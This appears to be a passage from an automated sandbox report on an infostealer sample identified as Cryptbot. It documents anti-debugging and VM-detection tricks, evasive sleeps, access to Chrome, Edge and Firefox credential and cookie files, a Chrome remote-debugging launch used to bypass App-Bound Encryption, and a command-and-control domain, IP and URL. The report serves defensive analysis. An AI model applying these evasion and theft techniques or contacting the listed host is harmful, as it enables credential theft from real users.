Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0B27 second address: 73B0B5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC85CDF02AFh 0x00000009 adc ecx, 7FE4535Eh 0x0000000f jmp 00007FC85CDF02B9h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0855 second address: 73B087A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85D338E32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC85D338E2Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B087A second address: 73B0880 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0880 second address: 73B0886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D18 second address: 73B0D33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC85CDF02B3h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D33 second address: 73B0D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D39 second address: 73B0D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D3D second address: 73B0D41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D41 second address: 73B0D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC85CDF02AEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D5F second address: 73B0D63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 73B0D63 second address: 73B0D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003DD second address: 74003ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC85D338E2Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003ED second address: 74003FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 74003FC second address: 7400402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400402 second address: 7400452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC85CDF02B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC85CDF02AEh 0x00000013 or ecx, 21D42788h 0x00000019 jmp 00007FC85CDF02ABh 0x0000001e popfd 0x0000001f mov ah, 43h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 call 00007FC85CDF02ACh 0x0000002c pop eax 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400452 second address: 7400457 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400457 second address: 7400474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 00EDCC83h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dl, byte ptr [ebp+14h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC85CDF02ABh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 7400474 second address: 740048B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [ebp+10h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov cl, E0h 0x00000014 push edx 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E74FC4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E748D7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: E74822 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 101E480 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10A8DCA instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2407 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 2300 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 4576 Thread sleep count: 55 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4576 Thread sleep time: -110055s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3564 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3564 Thread sleep time: -114057s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3784 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5500 Thread sleep count: 2407 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5500 Thread sleep time: -4816407s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4904 Thread sleep count: 2300 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4904 Thread sleep time: -4602300s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6720 Thread sleep count: 57 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6720 Thread sleep time: -114057s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2792 Thread sleep count: 52 > 30 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2792 Thread sleep time: -104052s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 4544 Thread sleep count: 249 > 30 Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: chrome.exe, 00000003.00000002.2495972219.000001F0FDF0B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\Desktop\file.exe File opened: NTICE
Source: C:\Users\user\Desktop\file.exe File opened: SICE
Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_002D8230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_002D116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002D1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_002D11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_002D13C9
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6684D0 cpuid 9_2_6C6684D0
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 9.2.service123.exe.6c5e0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 1364, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1561847 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Antivirus / Scanner detection for submitted sample 2->58 60 8 other signatures 2->60 7 file.exe 5 3 2->7         started        12 service123.exe 2->12         started        14 service123.exe 2->14         started        process3 dnsIp4 40 fvtekk5pn.top 34.116.198.130, 49707, 49752, 49762 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 7->40 42 127.0.0.1 unknown unknown 7->42 44 home.fvtekk5pn.top 7->44 34 C:\Users\user\...\unmYCIPOHmXNjqOesrEy.dll, PE32 7->34 dropped 36 C:\Users\user\AppData\...\service123.exe, PE32 7->36 dropped 62 Attempt to bypass Chrome Application-Bound Encryption 7->62 64 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 7->66 68 7 other signatures 7->68 16 service123.exe 7->16         started        19 WerFault.exe 22 16 7->19         started        22 chrome.exe 7->22         started        25 schtasks.exe 1 7->25         started        file5 signatures6 process7 dnsIp8 48 Multi AV Scanner detection for dropped file 16->48 50 Found evasive API chain (may stop execution after checking mutex) 16->50 52 Found stalling execution ending in API Sleep call 16->52 32 C:\ProgramData\Microsoft\...\Report.wer, Unicode 19->32 dropped 38 239.255.255.250 unknown Reserved 22->38 27 chrome.exe 22->27         started        30 conhost.exe 25->30         started        file9 signatures10 process11 dnsIp12 46 www.google.com 172.217.21.36, 443, 49780 GOOGLEUS United States 27->46
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
239.255.255.250
 unknown Reserved
unknown unknown false
34.116.198.130
 home.fvtekk5pn.top United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
172.217.21.36
 www.google.com United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
home.fvtekk5pn.top 34.116.198.130 true
www.google.com 172.217.21.36 true
fvtekk5pn.top 34.116.198.130 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://home.fvtekk5pn.top/LCXOUUtXgrKhKDLYSbzW1732019347 false
    		high